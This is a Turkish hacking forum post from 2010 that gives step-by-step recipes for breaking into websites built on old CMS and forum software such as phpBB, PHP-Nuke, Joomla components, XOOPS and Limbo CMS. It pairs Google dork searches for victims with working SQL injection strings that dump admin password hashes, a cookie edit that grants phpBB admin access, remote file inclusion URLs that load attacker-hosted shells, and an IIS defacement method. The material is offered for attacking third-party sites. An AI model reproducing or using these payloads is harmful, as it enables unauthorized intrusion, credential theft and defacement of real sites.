hangi site nasıl hacklenir Açıklamalı

Önceki başlık Sonraki başlık Aşağa gitmek

hangi site nasıl hacklenir Açıklamalı

Mesaj  Admin Bir Perş. Haz. 24, 2010 12:50 am

HANGİ SİTE NASIL HACKLENİR ??
MİNİ NUKE V2.3Mini nuke sitelerle uğraşmak için ilk öncewwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.Karşımıza gelen sitelerin sonuna:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.MD5 i kırmak içindehttp://passcrack.spb.ru [Linkleri görebilmek için üye olun veya giriş yapın.] WAR V.1.0ilk önce [Linkleri görebilmek için üye olun veya giriş yapın.] ’Powered by: Virtual War v1.5.0’Sonu /war.php olan siteleri seçiyoruz vewar.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: [Linkleri görebilmek için üye olun veya giriş yapın.] kodunu ekliyoruz.Artık admin palenelindeyiz[Eski bir açık olduğu için sonuç alamayabilirsiniz]-------------------------------------------------------------------------------PHPBB 2.0.11işte meşhur phpbb açığıBize gereken en önemli program :http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasındankurban phpbb 2.0.11 sitemizi seçicez.Sitemizi bulduk 2 kez tıklıyoruz.Önümüze a%3A2%3A%7Bs%3A11%3A"autolog inid"%3Bs%3A0%3A%2 2"%3Bs%3A6%3A"userid"%3B s%3A1%3A"2"%3B%7D Gibi AbudikKubidik Kodlar Gelicek Üssteki Kodu Slipa%3A2%3A%7Bs%3A11%3A"autolog inid"%3Bb%3A1%3Bs% 3A6%3A"userid"%3Bs%3A1%3A% 222"%3B%7D Bu kodu yeryeştiriyoruzSaveliyoruz.Artık cooike editör ile işimiz bittiSitemizi yeniliyoruz bakıyoruz aaaa adminiz---------------------------------------------------------------------------------PHP NUKE SQL INJECTİONwww.googLe.com a giriyoruz aranacak kelimeye’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafiSearch bölümünü bulamadıysanızwww.hackleneceksite.com/modules.php?name=SearchAdminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.----------------------------------------------------------------------------------COM_REMOSİTORYwWW.Google.com ’’inurl:"com_remository"Bulduğumuz sitelere/[joomlapat....php?mosConfig][Linkleri görebilmek için üye olun veya giriş yapın.] _absolute_path=http://site/phpshell.phpKodunu ekliyoruz...---------------------------------------------------------------------------------------XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİTWWW.Google.Com ’inurl:modules/myAds/’Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.http://www.site.com/modules/myAds/an...rs+limit+1*1/*Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...-----------------------------------------------------------------------------------------TOPLİST HACK PHPBBGoogLe Arama : inurl:"toplist.php" "powered by phpbb"Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls------------------------------------------------------------------------------------------ PC_COOKBOOK JOOMLA COMPONENT- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities- Author: JaheeMCreW- Uygulama : pc_cookbook Component- Version : koyans 0.3Yapmaniz gereken bir arama moturunda örnek google’ da" allinurl:com_pccookbook " olarak aratmaktir..Exploit :/[path]/compo...osConfig_absol][Linkleri görebilmek için üye olun veya giriş yapın.] ute_path=http://evilscript-----------------------------------------------------------------------------------------SİMPLE BOARD MAMBOİlk Önce WwwW.GoogLe.comDaha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...http://site.com/components/com_simpl...me%20-a;id;pwd-----------------------------------------------------------------------------------------ShoutBox IncLusionshoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...Code:/shoutbox/expanded.php?conf=GoogLe Arama : inurl:"/shoutbox/expanded.php?"------------------------------------------------------------------------------------------PHPBAZAR <= 2.1.0 Remote File INCLLUSIONGoogle Search=inurl:classified.php [Linkleri görebilmek için üye olun veya giriş yapın.] [bmachine]yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca admininşifresini görüyoruz : )--------------------------------------------------------------------------------------------Limbo CMS <= 1.04 Remote File InclusionGoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls---------------------------------------------------------------------------------------------CaLogic Calendars V1.2.2 - Remote File IncludeGoogLe Arama : CaLogic Calendars V1.2.2kullanmak için :/reconfig....1;evil_script]][Linkleri görebilmek için üye olun veya giriş yapın.] Remote File Inclusion [phpBB]PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= ][Linkleri görebilmek için üye olun veya giriş yapın.] CMS Remote File Include [ RFI ]Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..Uretici Firma : [Linkleri görebilmek için üye olun veya giriş yapın.] CMS Remote File Include][Linkleri görebilmek için üye olun veya giriş yapın.] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..GoogLe arama : Powered by Jetbox------------------------------------------------------------------------------------------------Aratma Kodu : PHP Upload Center v2.0Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt? Çok KaRışık biLiyOrum Ama DikkatLi Okuyun.. 1.YönTem bu kodu başLaT//ÇaLıştıRa KopyaLayıp YapışTırın..%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F} enTere BaSın.2.YönTem : AcıLan Web SayFaSna Saq TıkLıyıP Yeni // Web KLasöRü YaRaTın..YaraTTıkTan SonRa..3.YönTem : [Linkleri görebilmek için üye olun veya giriş yapın.] 'qiRin Aynen ŞöyLé Yazın iSS Acıqı oLan SiteLer Çıkan Sitelerden bulabiLirsiniz İss Acıqı oLanı Bn 3-5 Tane YazıCam BuRaya OnLArDanda YaRarLanabiLirSiniz İndexinizi BaSabiLirSiniz Her NéySéé..! siteyide buLduk DieeLim AçTıqımız Web KLaSöRüne Siteyi YapışTırıyOruzSonRada iLeriyi TıkLıyOruz Bitince Son'u TıkLAyıp oLuSan Web kLaSöRünü Acıp İndexi İçine AtıyOrSunuzVe Site Sizin TaRaFınızDan HackLEnmiş oLuyO..İyi HackLemeLer..))

avatar
Admin
Admin
Admin

Mesaj Sayısı : 80
Kayıt tarihi : 17/04/10
Nerden : Top Secret

Kullanıcı profilini gör http://starhack.team-talk.net

Sayfa başına dön Aşağa gitmek

Önceki başlık Sonraki başlık Sayfa başına dön

- Similar topics

 
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz